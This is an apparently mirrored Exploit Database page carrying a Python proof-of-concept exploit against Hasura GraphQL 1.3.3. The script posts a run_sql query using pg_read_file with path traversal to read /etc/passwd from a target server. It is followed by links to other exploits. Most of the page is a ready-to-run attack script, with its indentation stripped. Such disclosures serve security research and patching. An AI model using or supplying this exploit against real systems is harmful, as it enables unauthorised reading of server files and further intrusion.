Hasura GraphQL 1.3.3 – Local File Read

Exploit Database
17 阅读

作者： Dolev Farhi

日期： 2021-04-21
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/49790/

# Exploit Title: Hasura GraphQL 1.3.3 - Local File Read
# Software: Hasura GraphQL
# Software Link: https://github.com/hasura/graphql-engine
# Version: 1.3.3
# Exploit Author: Dolev Farhi
# Date: 4/19./2021
# Tested on: Ubuntu

import requests
import sys

HASURA_SCHEME = 'http'
HASURA_HOST = '192.168.1.1'
HASURA_PORT = 80
READ_FILE = '/etc/passwd'

def LFI(file):
SQLI = "SELECT pg_read_file('../../../../../../../../../{}',0,1000);".format(file)
data ={"type":"bulk","args":[{"type":"run_sql","args":{"sql":SQLI,"cascade":False,"read_only":False}}]}
endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
r = requests.post(endpoint, json=data)
return r.json()

res = LFI(READ_FILE)

try:
print(res[0]['result'][1][0])
except:
print(res)

last Exploits
Hasura GraphQL 1.3.3 – Local File Read的更多信息

Joomla! Component Appointment 1.5 – Local File Inclusion：
EyesOfNetwork 5.3 – LFI：
Apache Struts 2.0 – ‘XSLTResult.java’ Arbitrary File Upload：
mySurvey 1.0 – ‘id’ SQL Injection：
StudyMD 0.3.2 – Persistent Cross-Site Scripting：
Justdial Clone Script – ‘fid’ SQL Injection：
MyBB Thank You/Like Plugin 3.0.0 – Cross-Site Scripting：
Zoom Meeting Connector 4.6.239.20200613 – Remote Root Exploit (Authenticated)：